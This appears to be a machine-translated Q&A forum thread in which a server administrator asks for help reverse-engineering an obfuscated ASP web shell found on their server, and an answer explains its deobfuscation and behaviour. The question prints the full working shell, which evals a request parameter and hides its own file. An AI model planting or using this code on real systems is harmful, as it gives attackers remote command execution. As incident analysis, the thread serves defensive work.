我在服务器上发现了有趣的恶意软件,它做了一些坏事。现在我正在尝试对其进行逆向工程,但由于完全缺乏VB\ASP的知识,我需要寻求您的帮助,同事们。
<%
Function MorfiCoder(Code)
MorfiCoder=Replace(Replace(StrReverse(Code),"/*/",""""),"*",vbCrlf)
End Function
Execute MorfiCoder(")/*/srerif/*/(tseuqer lave")
Set fso=CreateObject("Scripting.FileSystemObject")
Set f=fso.GetFile(Request.ServerVariables("PATH_TRANSLATED"))
if f.attributes <> 39 then
f.attributes = 39
end if
%>
正如我所理解的,它执行一些命令,并在某个地方创建具有系统\隐藏属性的文件。主要的问题是——如何使用它,也就是说,从我看到的日志中,黑客上传了这个文件,并使用POST命令它。我想命令这也要理解,他是如何能够上传文件到一些文件夹,他应该能够做到这一点
欢迎提出任何建议。带有卷曲POST的样品将是惊人的。
不需要VB中的知识来研究代码的作用;只需阅读文档即可。
MorfiCoder(")/*/srerif/*/(tseuqer lave")返回eval request("firers")(我认为像Replace或StrReverse这样的函数是显而易见的)。
Execute和eval是不言自明的;request的文档在这里:
Request对象检索客户端浏览器在HTTP请求期间传递给服务器的值。
因此,无论firers请求变量中的字符串是什么,它都将被执行(您说过您已经知道攻击者使用简单的POST将数据发送到他的脚本)。
Set fso=CreateObject("Scripting.FileSystemObject")创建一个FileSystemObject对象。
Set f=fso.GetFile(Request.ServerVariables("PATH_TRANSLATED"))创建一个文件对象;使用CCD_ 9中的路径。
然后在该文件对象上设置一些attributes(Archive、System、Hidden、ReadOnly)(以隐藏该脚本)。
您提供的信息显然无法回答攻击者为什么能够将此文件上传到您的服务器,这也超出了这个问题的范围,可能会偏离stackoverflow的主题。